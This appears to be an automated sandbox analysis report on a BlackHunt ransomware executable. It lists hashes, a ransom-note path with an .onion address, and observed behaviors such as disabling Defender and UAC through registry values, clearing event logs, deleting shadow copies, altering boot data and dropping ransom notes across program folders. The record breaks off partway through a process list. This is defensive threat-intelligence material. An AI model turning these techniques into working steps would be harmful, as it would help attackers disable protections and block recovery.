Analysis
-
max time kernel
143s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:51
Static task
static1
Behavioral task
behavioral1
Sample
7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe
Resource
win10v2004-20231222-en
General
-
Target
7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe
-
Size
707KB
-
MD5
759aeba36754bbd1cc95a32a4762fe12
-
SHA1
90e5f19816f5cb6a97d3e07912a8238b6f151f6e
-
SHA256
7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a
-
SHA512
bb62c00577206c8aced49d1c8699ffe10367d5182195702cf26807ba6427f07111bb4228c5d51f1eb378484d39e8aa102c4b04675a51c1a309957d0f28a0cc4a
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1A8ovnh:6uaTmkZJ+naie5OTamgEoKxLWrWh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 6396 fsutil.exe 12520 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 15916 wevtutil.exe 10772 wevtutil.exe 7432 wevtutil.exe 8280 wevtutil.exe 12868 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 4396 bcdedit.exe 5896 bcdedit.exe 12540 bcdedit.exe 11344 bcdedit.exe -
Renames multiple (3384) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 7596 wbadmin.exe 4648 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe -
Enumerates connected drives 3 TTPs 26 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\O: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\J: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\W: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\V: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\Q: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\U: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\I: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\A: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\S: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\R: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\N: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\K: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\Z: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\T: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\M: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\Y: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\G: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\H: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\L: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\X: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\B: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\E: 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\#BlackHunt_ReadMe.hta 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\#BlackHunt_ReadMe.txt 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fi-fi\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fi-fi\ui-strings.js 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_radio_unselected_18.svg 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_radio_unselected_18.svg 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\#BlackHunt_ReadMe.txt 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_es_135x40.svg 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\#BlackHunt_ReadMe.txt 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hr-hr\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\#BlackHunt_ReadMe.hta 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#BlackHunt_ReadMe.hta 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\#BlackHunt_ReadMe.txt 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\#BlackHunt_ReadMe.txt 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hu-hu\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\es-419_get.svg 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-tw\ui-strings.js 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nb-no\#BlackHunt_ReadMe.hta 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-tw\ui-strings.js 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Google\Update\1.3.36.151\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_out\#BlackHunt_ReadMe.hta 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\#BlackHunt_ReadMe.hta 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hu-hu\ui-strings.js 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\checkmark.png 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\ui-strings.js 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\css\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nl-nl\ui-strings.js 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files\VideoLAN\VLC\#BlackHunt_ReadMe.txt 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\#BlackHunt_ReadMe.hta 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\es-es\#BlackHunt_ReadMe.hta 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files\VideoLAN\VLC\lua\#BlackHunt_ReadMe.hta 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\main-selector.css 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\uk-ua\#BlackHunt_ReadMe.hta 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\#BlackHunt_ReadMe.hta 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\#BlackHunt_ReadMe.txt 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\dot.cur 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\ui-strings.js 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\open_original_form.gif 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\ui-strings.js 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\scanAppLogo.png 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-fr\ui-strings.js 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\#BlackHunt_ReadMe.hta 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\s_agreement_filetype.svg 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\#BlackHunt_ReadMe.txt 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_opencarat_18.svg 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files\Java\jdk-1.8\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files\7-Zip\Lang\ug.txt 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#BlackHunt_Private.key 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_18.svg 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 6120 8448 WerFault.exe 296 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2760 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3100 vssadmin.exe 4272 vssadmin.exe 15932 vssadmin.exe 2444 vssadmin.exe 4608 vssadmin.exe 1884 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 5444 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 11104 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe Token: SeRestorePrivilege 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe Token: SeBackupPrivilege 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe Token: SeTakeOwnershipPrivilege 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe Token: SeAuditPrivilege 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe Token: SeSecurityPrivilege 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe Token: SeIncBasePriorityPrivilege 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe Token: SeBackupPrivilege 2160 vssvc.exe Token: SeRestorePrivilege 2160 vssvc.exe Token: SeAuditPrivilege 2160 vssvc.exe Token: SeBackupPrivilege 7892 wbengine.exe Token: SeRestorePrivilege 7892 wbengine.exe Token: SeSecurityPrivilege 7892 wbengine.exe Token: SeSecurityPrivilege 15916 wevtutil.exe Token: SeBackupPrivilege 15916 wevtutil.exe Token: SeSecurityPrivilege 12868 wevtutil.exe Token: SeBackupPrivilege 12868 wevtutil.exe Token: SeSecurityPrivilege 7432 wevtutil.exe Token: SeBackupPrivilege 7432 wevtutil.exe Token: SeSecurityPrivilege 10772 wevtutil.exe Token: SeBackupPrivilege 10772 wevtutil.exe Token: SeSecurityPrivilege 8280 wevtutil.exe Token: SeBackupPrivilege 8280 wevtutil.exe Token: SeDebugPrivilege 5444 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3176 wrote to memory of 1940 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 91 PID 3176 wrote to memory of 1940 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 91 PID 3176 wrote to memory of 5004 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 93 PID 3176 wrote to memory of 5004 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 93 PID 3176 wrote to memory of 1920 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 95 PID 3176 wrote to memory of 1920 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 95 PID 3176 wrote to memory of 3008 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 97 PID 3176 wrote to memory of 3008 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 97 PID 1940 wrote to memory of 3256 1940 cmd.exe 99 PID 1940 wrote to memory of 3256 1940 cmd.exe 99 PID 3176 wrote to memory of 4048 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 100 PID 3176 wrote to memory of 4048 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 100 PID 3008 wrote to memory of 3672 3008 cmd.exe 105 PID 3008 wrote to memory of 3672 3008 cmd.exe 105 PID 1920 wrote to memory of 3776 1920 cmd.exe 104 PID 1920 wrote to memory of 3776 1920 cmd.exe 104 PID 5004 wrote to memory of 4376 5004 cmd.exe 102 PID 5004 wrote to memory of 4376 5004 cmd.exe 102 PID 4048 wrote to memory of 2392 4048 cmd.exe 103 PID 4048 wrote to memory of 2392 4048 cmd.exe 103 PID 3176 wrote to memory of 3828 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 176 PID 3176 wrote to memory of 3828 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 176 PID 3176 wrote to memory of 4128 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 108 PID 3176 wrote to memory of 4128 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 108 PID 3176 wrote to memory of 2412 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 110 PID 3176 wrote to memory of 2412 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 110 PID 3176 wrote to memory of 2316 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 112 PID 3176 wrote to memory of 2316 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 112 PID 3176 wrote to memory of 5072 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 116 PID 3176 wrote to memory of 5072 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 116 PID 3828 wrote to memory of 4676 3828 reg.exe 115 PID 3828 wrote to memory of 4676 3828 reg.exe 115 PID 3176 wrote to memory of 2360 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 183 PID 3176 wrote to memory of 2360 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 183 PID 4128 wrote to memory of 672 4128 cmd.exe 119 PID 4128 wrote to memory of 672 4128 cmd.exe 119 PID 2412 wrote to memory of 548 2412 cmd.exe 173 PID 2412 wrote to memory of 548 2412 cmd.exe 173 PID 3176 wrote to memory of 1648 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 120 PID 3176 wrote to memory of 1648 3176 